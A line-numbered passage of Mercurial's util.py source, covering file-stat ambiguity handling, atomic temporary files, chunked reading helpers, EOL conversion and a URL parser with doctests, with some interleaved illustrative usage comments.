2364 2375 self.stat = stat
2365 2376
2366 2377 @classmethod
2367 2378 def frompath(cls, path):
2368 2379 try:
2369 2380 stat = os.stat(path)
2370 2381 except OSError as err:
2371 2382 if err.errno != errno.ENOENT:
2372 2383 raise
2373 2384 stat = None
2374 2385 return cls(stat)
2375 2386
2376 2387 @classmethod
2377 2388 def fromfp(cls, fp):
2378 2389 stat = os.fstat(fp.fileno())
2379 2390 return cls(stat)
2380 2391
2381 2392 __hash__ = object.__hash__
2382 2393
2383 2394 def __eq__(self, old):
2384 2395 try:
2385 2396 # if ambiguity between stat of new and old file is
2386 2397 # avoided, comparison of size, ctime and mtime is enough
2387 2398 # to exactly detect change of a file regardless of platform
2388 2399 return (
2389 2400 self.stat.st_size == old.stat.st_size
2390 2401 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2391 2402 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2392 2403 )
2393 2404 except AttributeError:
2394 2405 pass
2395 2406 try:
2396 2407 return self.stat is None and old.stat is None
2397 2408 except AttributeError:
2398 2409 return False
2399 2410
2400 2411 def isambig(self, old):
2401 2412 """Examine whether new (= self) stat is ambiguous against old one
2402 2413
2403 2414 "S[N]" below means stat of a file at N-th change:
2404 2415
2405 2416 - S[n-1].ctime < S[n].ctime: can detect change of a file
2406 2417 - S[n-1].ctime == S[n].ctime
2407 2418 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2408 2419 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2409 2420 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2410 2421 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2411 2422
2412 2423 Case (*2) above means that a file was changed twice or more
2413 2424 within the same second (= S[n-1].ctime), so comparison of
2414 2425 timestamps is ambiguous.
2415 2426
2416 2427 The basic idea to avoid such ambiguity is "advance mtime 1 sec,
2417 2428 if the timestamp is ambiguous".
2418 2429
2419 2430 But advancing mtime only in case (*2) doesn't work as
2420 2431 expected, because naturally advanced S[n].mtime in case (*1)
2421 2432 might be equal to manually advanced S[n-1 or earlier].mtime.
2422 2433
2423 2434 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2424 2435 treated as ambiguous regardless of mtime, to avoid overlooking
2425 2436 a change due to a collision between such mtimes.
2426 2437
2427 2438 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2428 2439 S[n].mtime", even if size of a file isn't changed.
2429 2440 """
2430 2441 try:
2431 2442 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2432 2443 except AttributeError:
2433 2444 return False
2434 2445
2435 2446 def avoidambig(self, path, old):
2436 2447 """Change file stat of specified path to avoid ambiguity
2437 2448
2438 2449 'old' should be previous filestat of 'path'.
2439 2450
2440 2451 Avoiding ambiguity is skipped if the process doesn't have
2441 2452 appropriate privileges for 'path'; this returns False in that
2442 2453 case.
2443 2454
2444 2455 Otherwise, this returns True, as "ambiguity is avoided".
2445 2456 """
2446 2457 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2447 2458 try:
2448 2459 os.utime(path, (advanced, advanced))
2449 2460 except OSError as inst:
2450 2461 if inst.errno == errno.EPERM:
2451 2462 # utime() on the file created by another user causes EPERM,
2452 2463 # if a process doesn't have appropriate privileges
2453 2464 return False
2454 2465 raise
2455 2466 return True
2456 2467
2457 2468 def __ne__(self, other):
2458 2469 return not self == other
2459 2470
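# Sketch of the intended pattern (path hypothetical): capture the stat of
# a lock-guarded file before rewriting it, then nudge mtime forward if the
# rewrite landed within the same second.
#
#   old = filestat.frompath(b'.hg/dirstate')
#   # ... rewrite the file ...
#   new = filestat.frompath(b'.hg/dirstate')
#   if new.isambig(old):
#       new.avoidambig(b'.hg/dirstate', old)   # mtime advanced by 1 sec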
2460 2471
2461 2472 class atomictempfile(object):
2462 2473 """writable file object that atomically updates a file
2463 2474
2464 2475 All writes will go to a temporary copy of the original file. Call
2465 2476 close() when you are done writing, and atomictempfile will rename
2466 2477 the temporary copy to the original name, making the changes
2467 2478 visible. If the object is destroyed without being closed, all your
2468 2479 writes are discarded.
2469 2480
2470 2481 checkambig argument of constructor is used with filestat, and is
2471 2482 useful only if target file is guarded by any lock (e.g. repo.lock
2472 2483 or repo.wlock).
2473 2484 """
2474 2485
2475 2486 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2476 2487 self.__name = name # permanent name
2477 2488 self._tempname = mktempcopy(
2478 2489 name,
2479 2490 emptyok=(b'w' in mode),
2480 2491 createmode=createmode,
2481 2492 enforcewritable=(b'w' in mode),
2482 2493 )
2483 2494
2484 2495 self._fp = posixfile(self._tempname, mode)
2485 2496 self._checkambig = checkambig
2486 2497
2487 2498 # delegated methods
2488 2499 self.read = self._fp.read
2489 2500 self.write = self._fp.write
2490 2501 self.seek = self._fp.seek
2491 2502 self.tell = self._fp.tell
2492 2503 self.fileno = self._fp.fileno
2493 2504
2494 2505 def close(self):
2495 2506 if not self._fp.closed:
2496 2507 self._fp.close()
2497 2508 filename = localpath(self.__name)
2498 2509 oldstat = self._checkambig and filestat.frompath(filename)
2499 2510 if oldstat and oldstat.stat:
2500 2511 rename(self._tempname, filename)
2501 2512 newstat = filestat.frompath(filename)
2502 2513 if newstat.isambig(oldstat):
2503 2514 # stat of changed file is ambiguous to original one
2504 2515 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2505 2516 os.utime(filename, (advanced, advanced))
2506 2517 else:
2507 2518 rename(self._tempname, filename)
2508 2519
2509 2520 def discard(self):
2510 2521 if not self._fp.closed:
2511 2522 try:
2512 2523 os.unlink(self._tempname)
2513 2524 except OSError:
2514 2525 pass
2515 2526 self._fp.close()
2516 2527
2517 2528 def __del__(self):
2518 2529 if safehasattr(self, '_fp'): # constructor actually did something
2519 2530 self.discard()
2520 2531
2521 2532 def __enter__(self):
2522 2533 return self
2523 2534
2524 2535 def __exit__(self, exctype, excvalue, traceback):
2525 2536 if exctype is not None:
2526 2537 self.discard()
2527 2538 else:
2528 2539 self.close()
2529 2540
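# Illustrative usage (filename hypothetical): the content becomes visible
# only on a clean exit; on an exception the temporary copy is discarded
# and the original file is left untouched.
#
#   with atomictempfile(b'somefile', b'wb') as fp:
#       fp.write(b'new content\n')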
2530 2541
2531 2542 def unlinkpath(f, ignoremissing=False, rmdir=True):
2532 2543 """unlink and remove the directory if it is empty"""
2533 2544 if ignoremissing:
2534 2545 tryunlink(f)
2535 2546 else:
2536 2547 unlink(f)
2537 2548 if rmdir:
2538 2549 # try removing directories that might now be empty
2539 2550 try:
2540 2551 removedirs(os.path.dirname(f))
2541 2552 except OSError:
2542 2553 pass
2543 2554
2544 2555
2545 2556 def tryunlink(f):
2546 2557 """Attempt to remove a file, ignoring ENOENT errors."""
2547 2558 try:
2548 2559 unlink(f)
2549 2560 except OSError as e:
2550 2561 if e.errno != errno.ENOENT:
2551 2562 raise
2552 2563
2553 2564
2554 2565 def makedirs(name, mode=None, notindexed=False):
2555 2566 """recursive directory creation with parent mode inheritance
2556 2567
2557 2568 Newly created directories are marked as "not to be indexed by
2558 2569 the content indexing service", if ``notindexed`` is specified
2559 2570 for "write" mode access.
2560 2571 """
2561 2572 try:
2562 2573 makedir(name, notindexed)
2563 2574 except OSError as err:
2564 2575 if err.errno == errno.EEXIST:
2565 2576 return
2566 2577 if err.errno != errno.ENOENT or not name:
2567 2578 raise
2568 2579 parent = os.path.dirname(os.path.abspath(name))
2569 2580 if parent == name:
2570 2581 raise
2571 2582 makedirs(parent, mode, notindexed)
2572 2583 try:
2573 2584 makedir(name, notindexed)
2574 2585 except OSError as err:
2575 2586 # Catch EEXIST to handle races
2576 2587 if err.errno == errno.EEXIST:
2577 2588 return
2578 2589 raise
2579 2590 if mode is not None:
2580 2591 os.chmod(name, mode)
2581 2592
2582 2593
2583 2594 def readfile(path):
2584 2595 with open(path, b'rb') as fp:
2585 2596 return fp.read()
2586 2597
2587 2598
2588 2599 def writefile(path, text):
2589 2600 with open(path, b'wb') as fp:
2590 2601 fp.write(text)
2591 2602
2592 2603
2593 2604 def appendfile(path, text):
2594 2605 with open(path, b'ab') as fp:
2595 2606 fp.write(text)
2596 2607
2597 2608
2598 2609 class chunkbuffer(object):
2599 2610 """Allow arbitrary sized chunks of data to be efficiently read from an
2600 2611 iterator over chunks of arbitrary size."""
2601 2612
2602 2613 def __init__(self, in_iter):
2603 2614 """in_iter is the iterator that's iterating over the input chunks."""
2604 2615
2605 2616 def splitbig(chunks):
2606 2617 for chunk in chunks:
2607 2618 if len(chunk) > 2 ** 20:
2608 2619 pos = 0
2609 2620 while pos < len(chunk):
2610 2621 end = pos + 2 ** 18
2611 2622 yield chunk[pos:end]
2612 2623 pos = end
2613 2624 else:
2614 2625 yield chunk
2615 2626
2616 2627 self.iter = splitbig(in_iter)
2617 2628 self._queue = collections.deque()
2618 2629 self._chunkoffset = 0
2619 2630
2620 2631 def read(self, l=None):
2621 2632 """Read L bytes of data from the iterator of chunks of data.
2622 2633 Returns less than L bytes if the iterator runs dry.
2623 2634
2624 2635 If the size parameter is omitted, read everything."""
2625 2636 if l is None:
2626 2637 return b''.join(self.iter)
2627 2638
2628 2639 left = l
2629 2640 buf = []
2630 2641 queue = self._queue
2631 2642 while left > 0:
2632 2643 # refill the queue
2633 2644 if not queue:
2634 2645 target = 2 ** 18
2635 2646 for chunk in self.iter:
2636 2647 queue.append(chunk)
2637 2648 target -= len(chunk)
2638 2649 if target <= 0:
2639 2650 break
2640 2651 if not queue:
2641 2652 break
2642 2653
2643 2654 # The easy way to do this would be to queue.popleft(), modify the
2644 2655 # chunk (if necessary), then queue.appendleft(). However, for cases
2645 2656 # where we read partial chunk content, this incurs 2 dequeue
2646 2657 # mutations and creates a new str for the remaining chunk in the
2647 2658 # queue. Our code below avoids this overhead.
2648 2659
2649 2660 chunk = queue[0]
2650 2661 chunkl = len(chunk)
2651 2662 offset = self._chunkoffset
2652 2663
2653 2664 # Use full chunk.
2654 2665 if offset == 0 and left >= chunkl:
2655 2666 left -= chunkl
2656 2667 queue.popleft()
2657 2668 buf.append(chunk)
2658 2669 # self._chunkoffset remains at 0.
2659 2670 continue
2660 2671
2661 2672 chunkremaining = chunkl - offset
2662 2673
2663 2674 # Use all of unconsumed part of chunk.
2664 2675 if left >= chunkremaining:
2665 2676 left -= chunkremaining
2666 2677 queue.popleft()
2667 2678 # offset == 0 is enabled by block above, so this won't merely
2668 2679 # copy via ``chunk[0:]``.
2669 2680 buf.append(chunk[offset:])
2670 2681 self._chunkoffset = 0
2671 2682
2672 2683 # Partial chunk needed.
2673 2684 else:
2674 2685 buf.append(chunk[offset : offset + left])
2675 2686 self._chunkoffset += left
2676 2687 left -= chunkremaining
2677 2688
2678 2689 return b''.join(buf)
2679 2690
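# Illustrative example: exact-length reads over an iterator of unevenly
# sized chunks.
#
#   >>> cb = chunkbuffer(iter([b'abc', b'de', b'fgh']))
#   >>> cb.read(4)
#   'abcd'
#   >>> cb.read(4)
#   'efgh'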
2680 2691
2681 2692 def filechunkiter(f, size=131072, limit=None):
2682 2693 """Create a generator that produces the data in the file size
2683 2694 (default 131072) bytes at a time, up to optional limit (default is
2684 2695 to read all data). Chunks may be less than size bytes if the
2685 2696 chunk is the last chunk in the file, or the file is a socket or
2686 2697 some other type of file that sometimes reads less data than is
2687 2698 requested."""
2688 2699 assert size >= 0
2689 2700 assert limit is None or limit >= 0
2690 2701 while True:
2691 2702 if limit is None:
2692 2703 nbytes = size
2693 2704 else:
2694 2705 nbytes = min(limit, size)
2695 2706 s = nbytes and f.read(nbytes)
2696 2707 if not s:
2697 2708 break
2698 2709 if limit:
2699 2710 limit -= len(s)
2700 2711 yield s
2701 2712
2702 2713
2703 2714 class cappedreader(object):
2704 2715 """A file object proxy that allows reading up to N bytes.
2705 2716
2706 2717 Given a source file object, instances of this type allow reading up to
2707 2718 N bytes from that source file object. Attempts to read past the allowed
2708 2719 limit are treated as EOF.
2709 2720
2710 2721 It is assumed that I/O is not performed on the original file object
2711 2722 in addition to I/O that is performed by this instance. If there is,
2712 2723 state tracking will get out of sync and unexpected results will ensue.
2713 2724 """
2714 2725
2715 2726 def __init__(self, fh, limit):
2716 2727 """Allow reading up to <limit> bytes from <fh>."""
2717 2728 self._fh = fh
2718 2729 self._left = limit
2719 2730
2720 2731 def read(self, n=-1):
2721 2732 if not self._left:
2722 2733 return b''
2723 2734
2724 2735 if n < 0:
2725 2736 n = self._left
2726 2737
2727 2738 data = self._fh.read(min(n, self._left))
2728 2739 self._left -= len(data)
2729 2740 assert self._left >= 0
2730 2741
2731 2742 return data
2732 2743
2733 2744 def readinto(self, b):
2734 2745 res = self.read(len(b))
2735 2746 if res is None:
2736 2747 return None
2737 2748
2738 2749 b[0 : len(res)] = res
2739 2750 return len(res)
2740 2751
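# Illustrative usage: wrap a file object so a consumer cannot read past a
# frame boundary, e.g. a length-prefixed payload followed by more data.
#
#   >>> fh = bytesio(b'payloadTRAILER')
#   >>> capped = cappedreader(fh, 7)
#   >>> capped.read()
#   'payload'
#   >>> capped.read(1)
#   ''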
2741 2752
2742 2753 def unitcountfn(*unittable):
2743 2754 '''return a function that renders a readable count of some quantity'''
2744 2755
2745 2756 def go(count):
2746 2757 for multiplier, divisor, format in unittable:
2747 2758 if abs(count) >= divisor * multiplier:
2748 2759 return format % (count / float(divisor))
2749 2760 return unittable[-1][2] % count
2750 2761
2751 2762 return go
2752 2763
2753 2764
2754 2765 def processlinerange(fromline, toline):
2755 2766 """Check that linerange <fromline>:<toline> makes sense and return a
2756 2767 0-based range.
2757 2768
2758 2769 >>> processlinerange(10, 20)
2759 2770 (9, 20)
2760 2771 >>> processlinerange(2, 1)
2761 2772 Traceback (most recent call last):
2762 2773 ...
2763 2774 ParseError: line range must be positive
2764 2775 >>> processlinerange(0, 5)
2765 2776 Traceback (most recent call last):
2766 2777 ...
2767 2778 ParseError: fromline must be strictly positive
2768 2779 """
2769 2780 if toline - fromline < 0:
2770 2781 raise error.ParseError(_(b"line range must be positive"))
2771 2782 if fromline < 1:
2772 2783 raise error.ParseError(_(b"fromline must be strictly positive"))
2773 2784 return fromline - 1, toline
2774 2785
2775 2786
2776 2787 bytecount = unitcountfn(
2777 2788 (100, 1 << 30, _(b'%.0f GB')),
2778 2789 (10, 1 << 30, _(b'%.1f GB')),
2779 2790 (1, 1 << 30, _(b'%.2f GB')),
2780 2791 (100, 1 << 20, _(b'%.0f MB')),
2781 2792 (10, 1 << 20, _(b'%.1f MB')),
2782 2793 (1, 1 << 20, _(b'%.2f MB')),
2783 2794 (100, 1 << 10, _(b'%.0f KB')),
2784 2795 (10, 1 << 10, _(b'%.1f KB')),
2785 2796 (1, 1 << 10, _(b'%.2f KB')),
2786 2797 (1, 1, _(b'%.0f bytes')),
2787 2798 )
2788 2799
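# Illustrative values from the table above: precision drops as the count
# grows within each unit.
#
#   >>> bytecount(100)
#   '100 bytes'
#   >>> bytecount(2252)
#   '2.20 KB'
#   >>> bytecount(100 * (1 << 20))
#   '100 MB'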
2789 2800
2790 2801 class transformingwriter(object):
2791 2802 """Writable file wrapper to transform data by function"""
2792 2803
2793 2804 def __init__(self, fp, encode):
2794 2805 self._fp = fp
2795 2806 self._encode = encode
2796 2807
2797 2808 def close(self):
2798 2809 self._fp.close()
2799 2810
2800 2811 def flush(self):
2801 2812 self._fp.flush()
2802 2813
2803 2814 def write(self, data):
2804 2815 return self._fp.write(self._encode(data))
2805 2816
2806 2817
2807 2818 # Matches a single EOL, which can either be a CRLF where repeated CRs
2808 2819 # are removed, or a LF. We do not care about old Macintosh files, so a
2809 2820 # stray CR is an error.
2810 2821 _eolre = remod.compile(br'\r*\n')
2811 2822
2812 2823
2813 2824 def tolf(s):
2814 2825 return _eolre.sub(b'\n', s)
2815 2826
2816 2827
2817 2828 def tocrlf(s):
2818 2829 return _eolre.sub(b'\r\n', s)
2819 2830
2820 2831
2821 2832 def _crlfwriter(fp):
2822 2833 return transformingwriter(fp, tocrlf)
2823 2834
2824 2835
2825 2836 if pycompat.oslinesep == b'\r\n':
2826 2837 tonativeeol = tocrlf
2827 2838 fromnativeeol = tolf
2828 2839 nativeeolwriter = _crlfwriter
2829 2840 else:
2830 2841 tonativeeol = pycompat.identity
2831 2842 fromnativeeol = pycompat.identity
2832 2843 nativeeolwriter = pycompat.identity
2833 2844
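# Illustrative examples: runs of CRs before a LF collapse into the single
# requested EOL.
#
#   >>> tolf(b'a\r\r\nb\n')
#   'a\nb\n'
#   >>> tocrlf(b'a\nb\r\n')
#   'a\r\nb\r\n'
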
2834 2845 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2835 2846 3,
2836 2847 0,
2837 2848 ):
2838 2849 # There is an issue in CPython that some IO methods do not handle EINTR
2839 2850 # correctly. The following table shows what CPython version (and functions)
2840 2851 # are affected (buggy: has the EINTR bug, okay: otherwise):
2841 2852 #
2842 2853 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2843 2854 # --------------------------------------------------
2844 2855 # fp.__iter__ | buggy | buggy | okay
2845 2856 # fp.read* | buggy | okay [1] | okay
2846 2857 #
2847 2858 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2848 2859 #
2849 2860 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2850 2861 # like "read*" work fine, as we do not support Python < 2.7.4.
2851 2862 #
2852 2863 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2853 2864 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2854 2865 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2855 2866 # fp.__iter__ but not other fp.read* methods.
2856 2867 #
2857 2868 # On modern systems like Linux, the "read" syscall cannot be interrupted
2858 2869 # when reading "fast" files like on-disk files. So the EINTR issue only
2859 2870 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2860 2871 # files approximately as "fast" files and use the fast (unsafe) code path,
2861 2872 # to minimize the performance impact.
2862 2873
2863 2874 def iterfile(fp):
2864 2875 fastpath = True
2865 2876 if type(fp) is file:
2866 2877 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2867 2878 if fastpath:
2868 2879 return fp
2869 2880 else:
2870 2881 # fp.readline deals with EINTR correctly, use it as a workaround.
2871 2882 return iter(fp.readline, b'')
2872 2883
2873 2884
2874 2885 else:
2875 2886 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2876 2887 def iterfile(fp):
2877 2888 return fp
2878 2889
2879 2890
2880 2891 def iterlines(iterator):
2881 2892 for chunk in iterator:
2882 2893 for line in chunk.splitlines():
2883 2894 yield line
2884 2895
2885 2896
2886 2897 def expandpath(path):
2887 2898 return os.path.expanduser(os.path.expandvars(path))
2888 2899
2889 2900
2890 2901 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2891 2902 """Return the result of interpolating items in the mapping into string s.
2892 2903
2893 2904 prefix is a single character string, or a two character string with
2894 2905 a backslash as the first character if the prefix needs to be escaped in
2895 2906 a regular expression.
2896 2907
2897 2908 fn is an optional function that will be applied to the replacement text
2898 2909 just before replacement.
2899 2910
2900 2911 escape_prefix is an optional flag that allows using doubled prefix for
2901 2912 its escaping.
2902 2913 """
2903 2914 fn = fn or (lambda s: s)
2904 2915 patterns = b'|'.join(mapping.keys())
2905 2916 if escape_prefix:
2906 2917 patterns += b'|' + prefix
2907 2918 if len(prefix) > 1:
2908 2919 prefix_char = prefix[1:]
2909 2920 else:
2910 2921 prefix_char = prefix
2911 2922 mapping[prefix_char] = prefix_char
2912 2923 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2913 2924 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2914 2925
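# Illustrative example (mapping keys hypothetical): each %-prefixed key
# found in the string is replaced by its mapped value.
#
#   >>> interpolate(b'%', {b'foo': b'FOO', b'bar': b'BAR'}, b'%foo and %bar')
#   'FOO and BAR'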
2915 2926
2916 2927 def getport(port):
2917 2928 """Return the port for a given network service.
2918 2929
2919 2930 If port is an integer, it's returned as is. If it's a string, it's
2920 2931 looked up using socket.getservbyname(). If there's no matching
2921 2932 service, error.Abort is raised.
2922 2933 """
2923 2934 try:
2924 2935 return int(port)
2925 2936 except ValueError:
2926 2937 pass
2927 2938
2928 2939 try:
2929 2940 return socket.getservbyname(pycompat.sysstr(port))
2930 2941 except socket.error:
2931 2942 raise error.Abort(
2932 2943 _(b"no port number associated with service '%s'") % port
2933 2944 )
2934 2945
2935 2946
2936 2947 class url(object):
2937 2948 r"""Reliable URL parser.
2938 2949
2939 2950 This parses URLs and provides attributes for the following
2940 2951 components:
2941 2952
2942 2953 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2943 2954
2944 2955 Missing components are set to None. The only exception is
2945 2956 fragment, which is set to '' if present but empty.
2946 2957
2947 2958 If parsefragment is False, fragment is included in query. If
2948 2959 parsequery is False, query is included in path. If both are
2949 2960 False, both fragment and query are included in path.
2950 2961
2951 2962 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2952 2963
2953 2964 Note that for backward compatibility reasons, bundle URLs do not
2954 2965 take host names. That means 'bundle://../' has a path of '../'.
2955 2966
2956 2967 Examples:
2957 2968
2958 2969 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2959 2970 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2960 2971 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2961 2972 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2962 2973 >>> url(b'file:///home/joe/repo')
2963 2974 <url scheme: 'file', path: '/home/joe/repo'>
2964 2975 >>> url(b'file:///c:/temp/foo/')
2965 2976 <url scheme: 'file', path: 'c:/temp/foo/'>
2966 2977 >>> url(b'bundle:foo')
2967 2978 <url scheme: 'bundle', path: 'foo'>
2968 2979 >>> url(b'bundle://../foo')
2969 2980 <url scheme: 'bundle', path: '../foo'>
2970 2981 >>> url(br'c:\foo\bar')
2971 2982 <url path: 'c:\\foo\\bar'>
2972 2983 >>> url(br'\\blah\blah\blah')
2973 2984 <url path: '\\\\blah\\blah\\blah'>
2974 2985 >>> url(br'\\blah\blah\blah#baz')
2975 2986 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2976 2987 >>> url(br'file:///C:\users\me')
2977 2988 <url scheme: 'file', path: 'C:\\users\\me'>
2978 2989
2979 2990 Authentication credentials:
2980 2991
2981 2992 >>> url(b'ssh://joe:xyz@x/repo')
2982 2993 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2983 2994 >>> url(b'ssh://joe@x/repo')
2984 2995 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2985 2996
2986 2997 Query strings and fragments:
2987 2998
2988 2999 >>> url(b'http://host/a?b#c')
2989 3000 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2990 3001 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2991 3002 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2992 3003
2993 3004 Empty path:
2994 3005
2995 3006 >>> url(b'')
2996 3007 <url path: ''>
2997 3008 >>> url(b'#a')
2998 3009 <url path: '', fragment: 'a'>
2999 3010 >>> url(b'http://host/')
3000 3011 <url scheme: 'http', host: 'host', path: ''>
3001 3012 >>> url(b'http://host/#a')
3002 3013 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3003 3014
3004 3015 Only scheme:
3005 3016
3006 3017 >>> url(b'http:')
3007 3018 <url scheme: 'http'>
3008 3019 """
3009 3020
3010 3021 _safechars = b"!~*'()+"
3011 3022 _safepchars = b"/!~*'()+:\\"
3012 3023 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3013 3024
3014 3025 def __init__(self, path, parsequery=True, parsefragment=True):
3015 3026 # We slowly chomp away at path until we have only the path left
3016 3027 self.scheme = self.user = self.passwd = self.host = None
3017 3028 self.port = self.path = self.query = self.fragment = None
3018 3029 self._localpath = True
3019 3030 self._hostport = b''
3020 3031 self._origpath = path
3021 3032
3022 3033 if parsefragment and b'#' in path:
3023 3034 path, self.fragment = path.split(b'#', 1)
3024 3035
3025 3036 # special case for Windows drive letters and UNC paths
3026 3037 if hasdriveletter(path) or path.startswith(b'\\\\'):
3027 3038 self.path = path
3028 3039 return
3029 3040
3030 3041 # For compatibility reasons, we can't handle bundle paths as
3031 3042 # normal URLS
3032 3043 if path.startswith(b'bundle:'):
3033 3044 self.scheme = b'bundle'
3034 3045 path = path[7:]
3035 3046 if path.startswith(b'//'):
3036 3047 path = path[2:]
3037 3048 self.path = path
3038 3049 return
3039 3050
3040 3051 if self._matchscheme(path):
3041 3052 parts = path.split(b':', 1)
3042 3053 if parts[0]:
3043 3054 self.scheme, path = parts
3044 3055 self._localpath = False
3045 3056
3046 3057 if not path:
3047 3058 path = None
3048 3059 if self._localpath:
3049 3060 self.path = b''
3050 3061 return
3051 3062 else:
3052 3063 if self._localpath:
3053 3064 self.path = path
3054 3065 return
3055 3066
3056 3067 if parsequery and b'?' in path:
3057 3068 path, self.query = path.split(b'?', 1)
3058 3069 if not path:
3059 3070 path = None
3060 3071 if not self.query:
3061 3072 self.query = None
3062 3073
3063 3074 # // is required to specify a host/authority
3064 3075 if path and path.startswith(b'//'):
3065 3076 parts = path[2:].split(b'/', 1)
3066 3077 if len(parts) > 1:
3067 3078 self.host, path = parts
3068 3079 else:
3069 3080 self.host = parts[0]
3070 3081 path = None
3071 3082 if not self.host:
3072 3083 self.host = None
3073 3084 # path of file:///d is /d
3074 3085 # path of file:///d:/ is d:/, not /d:/
3075 3086 if path and not hasdriveletter(path):
3076 3087 path = b'/' + path
3077 3088
3078 3089 if self.host and b'@' in self.host:
3079 3090 self.user, self.host = self.host.rsplit(b'@', 1)
3080 3091 if b':' in self.user:
3081 3092 self.user, self.passwd = self.user.split(b':', 1)
3082 3093 if not self.host:
3083 3094 self.host = None
3084 3095
3085 3096 # Don't split on colons in IPv6 addresses without ports
3086 3097 if (
3087 3098 self.host
3088 3099 and b':' in self.host
3089 3100 and not (
3090 3101 self.host.startswith(b'[') and self.host.endswith(b']')
3091 3102 )
3092 3103 ):
3093 3104 self._hostport = self.host
3094 3105 self.host, self.port = self.host.rsplit(b':', 1)
3095 3106 if not self.host:
3096 3107 self.host = None
3097 3108
3098 3109 if (
3099 3110 self.host
3100 3111 and self.scheme == b'file'
3101 3112 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3102 3113 ):
3103 3114 raise error.Abort(
3104 3115 _(b'file:// URLs can only refer to localhost')
3105 3116 )
3106 3117
3107 3118 self.path = path
3108 3119
3109 3120 # leave the query string escaped
3110 3121 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3111 3122 v = getattr(self, a)
3112 3123 if v is not None:
3113 3124 setattr(self, a, urlreq.unquote(v))
3114 3125
3115 3126 @encoding.strmethod
3116 3127 def __repr__(self):
3117 3128 attrs = []
3118 3129 for a in (
3119 3130 b'scheme',
3120 3131 b'user',
3121 3132 b'passwd',
3122 3133 b'host',
3123 3134 b'port',
3124 3135 b'path',
3125 3136 b'query',
3126 3137 b'fragment',
3127 3138 ):
3128 3139 v = getattr(self, a)
3129 3140 if v is not None:
3130 3141 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3131 3142 return b'<url %s>' % b', '.join(attrs)
3132 3143
3133 3144 def __bytes__(self):
3134 3145 r"""Join the URL's components back into a URL string.
3135 3146
3136 3147 Examples:
3137 3148
3138 3149 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3139 3150 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3140 3151 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3141 3152 'http://user:pw@host:80/?foo=bar&baz=42'
3142 3153 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3143 3154 'http://user:pw@host:80/?foo=bar%3dbaz'
3144 3155 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3145 3156 'ssh://user:pw@[::1]:2200//home/joe#'
3146 3157 >>> bytes(url(b'http://localhost:80//'))
3147 3158 'http://localhost:80//'
3148 3159 >>> bytes(url(b'http://localhost:80/'))
3149 3160 'http://localhost:80/'
3150 3161 >>> bytes(url(b'http://localhost:80'))
3151 3162 'http://localhost:80/'
3152 3163 >>> bytes(url(b'bundle:foo'))
3153 3164 'bundle:foo'
3154 3165 >>> bytes(url(b'bundle://../foo'))
3155 3166 'bundle:../foo'
3156 3167 >>> bytes(url(b'path'))
3157 3168 'path'
3158 3169 >>> bytes(url(b'file:///tmp/foo/bar'))
3159 3170 'file:///tmp/foo/bar'
3160 3171 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3161 3172 'file:///c:/tmp/foo/bar'
3162 3173 >>> print(url(br'bundle:foo\bar'))
3163 3174 bundle:foo\bar
3164 3175 >>> print(url(br'file:///D:\data\hg'))
3165 3176 file:///D:\data\hg
3166 3177 """
3167 3178 if self._localpath:
3168 3179 s = self.path
3169 3180 if self.scheme == b'bundle':
3170 3181 s = b'bundle:' + s
3171 3182 if self.fragment:
3172 3183 s += b'#' + self.fragment
3173 3184 return s
3174 3185
3175 3186 s = self.scheme + b':'
3176 3187 if self.user or self.passwd or self.host:
3177 3188 s += b'//'
3178 3189 elif self.scheme and (
3179 3190 not self.path
3180 3191 or self.path.startswith(b'/')
3181 3192 or hasdriveletter(self.path)
3182 3193 ):
3183 3194 s += b'//'
3184 3195 if hasdriveletter(self.path):
3185 3196 s += b'/'
3186 3197 if self.user:
